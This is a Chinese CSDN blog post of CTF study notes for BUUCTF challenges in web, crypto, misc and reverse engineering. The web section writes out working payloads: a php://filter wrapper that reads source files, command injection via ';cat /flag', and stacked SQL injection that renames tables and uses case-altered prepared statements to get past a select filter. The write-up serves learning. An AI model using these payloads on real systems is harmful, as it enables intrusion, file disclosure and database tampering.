BUUCTF-堆叠注入-文件包含

已于 2023-04-09 21:06:10 修改
阅读量582 收藏 1
点赞数
分类专栏: BUUctf SQL注入 文章标签: 学习
于 2023-03-28 13:45:19 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64180167/article/details/129813445
版权

第五周学习-3.28

目录

Web

[ACTF2020 新生赛]Include

[ACTF2020 新生赛]Exec

[强网杯 2019]随便注

1.改名

2.预编译

Crypto

Url编码

看我回旋踢

Misc

你竟然赶我走

 大白

Reverse

reverse2

内涵的软件

Web

[ACTF2020 新生赛]Include

提示我们是include 文件包含

打开环境点击

 我们include 尝试直接访问根目录 失败

?file 是get形式

使用伪协议

?file=php://filter/read=convert.base64-encode/resource=flag.php

base64解密

文件包含支持的伪协议_data伪协议_三月樱的博客-CSDN博客

[ACTF2020 新生赛]Exec

这题很简单就直接

127.0.0.1;ls
127.0.0.1;ls / 发现flag文件
127.0.0.1;cat /flag

[强网杯 2019]随便注

这道题已经困惑我很久了 一直遇到就退出 今天认真写一下

 GET

开始判断注入类型

 字符 我们先构造万能密码

我们猜测语句像这样

select * from x=''1'''

所以我们构造

select * from x=''1' or '1'='1''
1' or '1'='1

我们开始猜字段

1' order by 3#
1' order by 3--+ 
都可以

 2个字段

我们开始注入

 发现过滤

这就是今天学习到的 如果 select 过滤了 可以使用 堆叠注入

数据库

0'; show databases;#

 查看表

0'; show tables;#

 一个一个访问 这里又有一个注意的地方

表名为数字时,要用反引号包起来查询。

0';show columns from `1919810931114514`#

找到flag 但是无法查看 

我们接着查看另一个表

0';show columns from words#

发现里面有id 和data 两个字段

1.改名

words里面有id和data两个字段

 而在最开始的时候 输入1 返回的就是id 和data

所以我们进行改名

使用rename 将words改为其他的 然后把1919810931114514改为words 
然后在1919810931114514的表中加上 id这个列 把flag改为data

0';alter table words rename  to words1;alter table `1919810931114514` rename
to words;alter table words change flag id varchar(50);#

0';
alter table words rename to words1;   把words改为words1
alter table `1919810931114514` rename to words; 把1919810931114514改为words
alter tables words change flag id varchar(50);#
把flag改为id 然后改变为char类型 输出

然后使用万能密码输出

1' or 1=1#

 学会了过滤select后怎么办 还有改文件名的操作

2.预编译

题目过滤了select 我们使用预编译

我们想要执行

select * from `1919810931114514`;

预编译语法

set用于设置变量名和值
prepare用于预备一个语句,并赋予名称,以后可以引用该语句
execute执行语句
deallocate prepare用来释放掉预处理的语句
-1;set @sql = concat('sel','ect * from`1919810931114514`;');prepare a from @sql;EXECUTE a;#


-1';
set @sql=concat('sel','ect * from `1919810931114514`;');
set设置@sql变量 和变量的值
prepare a from @sql;
将@sql 赋值给 a
execute a;#
执行a

发先过滤了set和prepare 我们进行大小写即可

-1';Set @sql = concat('sel','ect * from`1919810931114514`;');Prepare a from @sql;EXECUTE a;#

 得到flag

Crypto

Url编码

 直接解码即可

看我回旋踢

下载后打开文件 发现是flag格式

想到凯撒密码

对照ascii发现偏移量为13

synt{5pq1004q-86n5-46q8-o720-oro5on0417r1}

Misc

你竟然赶我走

 下载文件

CTF-Misc基础知识之图片及各种工具_ctf图片修复_Ke1R的博客-CSDN博客

打开Stegsolve.jar

放入图片

 选择这个 点击得到flag

 大白

下载文件 kali打开报错

是修改高度的错误

我们打开010

并且打开图片属性 查看分辨率为679x256

679为2A7

我们把高度修改为2A7即可

 

 flag出现

Reverse

reverse2

放入ida64

F5反编译

 和之前的差不多 变判断flag的内容

flag双击进去内容为

hacking_for_fun}

所以我们套上壳

flag{hacking_for_fun}

进行选择flag然后看看哪里更改了flag

 在这里发现了更改 我已经编译过了

只要选中数字 按r就可以改为这个 我们发现他把i和r都改为1

我们也更改即可

flag{hack1ng_fo1_fun}

内涵的软件

下载放入ida32 F5反编译

点击进入函数

 得到flag

更改为flag格式即可

双层小牛堡
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF 秘密文件 1
YueXuan_521的博客
11-20 495
BUUCTF 秘密文件 1 深夜里,Hack偷偷的潜入了某公司的内网,趁着深夜偷走了公司的秘密文件,公司的网络管理员通过通过监控工具成功的截取Hack入侵时数据流量,但是却无法分析出Hack到底偷走了什么机密文件,你能帮帮管理员分析出Hack到底偷走了什么机密文件吗?
buuctf之文件上传漏洞(Pass1~15)
yxzrw_TW的博客
10-21 1373
文件上传漏洞笔记
BUUCTF—Crypto大帝的秘密武器(详解,2024年网络安全网络编程总结篇
最新发布
m0_58269520的博客
04-05 1032
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!
BUUCTF之MISC(持续更新)
12-21
写在前面:这两天初接触ctf。先从最简单的杂项做起。之前看了杂项的教程也听了课,基本没怎么看答案。于是出现了好多问题,边做题边解决问题。。虽然这样对于深入学习不太好但是对于特别懒的我还挺喜欢这样的- -有几次真的心态崩溃。写一个记录贴。kali真的是个好东西。。 解决了的问题: kali忘了密码怎么办 kali的vmroots兼容性问题与如何更新源 php的基础语法 wenhex的使用方法 kali的基本工具了解 签到题 睡醒后做的第一个签到题,我可能脑子还在梦里,没有看见那么大的一个flag。 金三胖(帧隐藏问题) 一个gif图片 用stdeslove打开后用FB帧浏览器分离帧。最开始分离
Buuctf_Include【文件包含——伪类】
qq_61968245的博客
12-17 621
0x01 题目链接 BUUCTF在线评测BUUCTF 是一个 CTF 竞赛和训练平台,为各位 CTF 选手提供真实赛题在线复现等服务。https://buuoj.cn/challenges#[ACTF2020%20%E6%96%B0%E7%94%9F%E8%B5%9B]Include 0x02
buuctf-Include
xixihahawuwu的博客
11-23 1294
打开题目环境,就看到一个tips 点击 先回之前界面看看源码 线索这不就来了吗 … 这就是粗心的下场…浪费时间了 看下源码 源码啥都没有 突然觉得这题好熟悉的说 上题不也是给出了flag.php但是直接连接却没有内容吗,想着会不会又是php伪协议 毕竟这两道题是连在一起的(咳咳,不太明白的可以去看我的上一个博客,我可没有要你们给我增加浏览量的意思哈) 按照上题的格式试一下 ?file=php://filter/read=convert.base64-encode/resource=flag.p.
BUUCTF之[ACTF2020 新生赛]Include
weixin_44632787的博客
06-13 420
BUUCTF之[ACTF2020 新生赛]Include 启动项目,进入到我们的挑战页面 这个有个tips链接,点开它 发现并没有什么可用的信息,然后试试右键打开源代码和访问robots.txt协议都没有看到什么特别的信息。然后就开始想是不是该用dirsearch扫描一下这个网址看看可不可以扫描出什么来。但是又返回到题目去,看到了Include这个字眼。就想起了,这个题目可能是和文件包含相关。。。 打开火狐的Hackbar,导入链接emmmmmmmmmm 好的,那么现在开始输入文件包含里经常用到的方
BUUCTF 之 [ACTF2020 新生赛]Include
两个月亮
12-29 615
综上,可以发现 flag.php 页面通过 get 方式中的参数 file 来包含网站当前目录下的其他文件(如 flag.php),再加上提示 “你能找到其他 flag 吗?” ,我们可以推断,要解答该题目需要获取 flag.php 的源代码。我们可以通过将包含的文件进行转码,让浏览器无法识别这是 PHP 代码,其也就无法执行该 PHP 文件,于是将文件中的内容直接显示出来,我们将通过 PHP 伪协议来完成这一动作。后,我们可以得到一段 PHP 代码,其中就包含了 flag。可以发现,题目首页中的。
BUUCTF-Web-Mark loves cat变量函数覆盖
02-16
变量覆盖漏洞 自定义的参数值替换原有变量值的情况称为变量覆盖漏洞 经常导致变量覆盖漏洞场景有:$使用不当,extract()函数使用不当,parse_str()函数使用不当,import_request_variables()使用不当,开启了全局...
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
BUUCTF-MISC-WP(详细解题思路)
01-27
BUUCTF-MISC-WP(详细解题思路)
BUUCTF Reverse CrackRTF-附件资源
03-05
BUUCTF Reverse CrackRTF-附件资源
BUUCTF-Web-文件包含-[极客大挑战 2019]Secret File
weixin_42566218的博客
02-21 1210
BUUCTF-Web-文件包含-[极客大挑战 2019]Secret File 题目链接:BUUCTF 类型:文件包含 知识点: 302隐式重定向、php伪协议(php://filter) 解题过程 直接看页面没啥信息,F12打开控制台发现一个超链接,因为设置了style样式和背景颜色一样所以看不出来,其实可以在页面中用ctrl+a找到这个超链接标签 跟随超链接进入到Archive_room.php页面,这里有一个SECRET链接标签,用控制台看是链接到action.php页面的 但是点
BUUCTF学习笔记-Include
weixin_42271850的博客
09-27 2196
BUUCTF学习笔记-Include 时间:2020/09/24 考点:文件包含          打开页面只有一个a标签的超链接,指向的是?file=flag.php。结合题目的名称不难联想到这是一题文件包含的题目。          看到当?file=flag.php时,页面返回Can you find out
buuctf include
weixin_45711265的博客
01-13 259
Buuctf 的题: include 首先考虑 "php://input"伪协议 + POST发送PHP代码 的经典套路,发现题目过滤了php://input伪协议。 再考虑用php://filter"伪协议:当它与包含函数结合时,php://filter流会被当作php文件执行。所以我们一般对其进行编码,阻止其不执行。从而导致任意文件读取。 构造Payload: ?file=php://filter/read=convert.base64-encode/resource=flag.php 这里需要注意的是
BUUCTF | ACTF2020新生赛 include
weixin_47982238的博客
08-29 265
http://ee2ad130-7749-4957-b7b2-838f88b2bdd7.node3.buuoj.cn/ 其实看题目include我就先猜测也许是文件包含??? 点击tips,然后看到url栏如下图 看到?file=flag.php十有八九就是文件包含啦, 于是构造payload读取文件源码: ?file=php://filter/read=convert.base64-encode/resource=flag.php 看到一串base64编码,拿去解码成功拿到
文件包含BUGKU BUUCTF
zbbjya的博客
03-16 236
查看源代码 图片显示为文件包含 抓了一下包没啥发现 改了一下头,使用php://input 好像也没有什么用 说明这样的方式是不对的php伪协议 有 php://input 伪协议相当于一个削弱post的方法 php://filter可以获取指定文件源码,php://filter 是php中独有的一个协议,可以作为一个中间流来处理其他流,可以进行任意文件的读取;根据名字,filter,可以很容易想到这个协议可以用来过滤一些东西; 然后我们试试用这个 具体用法可看 https://blog.csdn.ne
BUUCTF WEB Include(文件包含
guishengyx的博客
10-18 1978
查看源码,什么都没有 点击tips 题目名称也提示了,是文件包含漏洞 百度了解到php://filter伪协议 ?file=php://filter/read=convert.base64-encode/resource=flag.php
BUUCTF[ACTF2020 新生赛]Include
楼阁de猫的博客
12-17 194
[ACTF2020 新生赛]Include 有一个tips标签,指向的是?file=flag.php 看到?file,应该首先想到的是文件包含 先读取源码,构造payload http://8cf4eecb-8bfa-4e2b-8616-b609fa0e7d3f.node3.buuoj.cn/?file=php://filter/convert.base64-encode/resource=index.php 发现了一串base64,解码得到 <meta charset="utf8">
buuctf-强网杯2019随便注
09-03
可能的解题思路包括对输入的数据进行SQL注入、获取数据库中的信息或者修改数据库中的数据等等。 解决这道题目需要具备一定的网络安全知识和相关工具的使用能力。通过不断的尝试和调试,找到并利用漏洞成功获取到...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值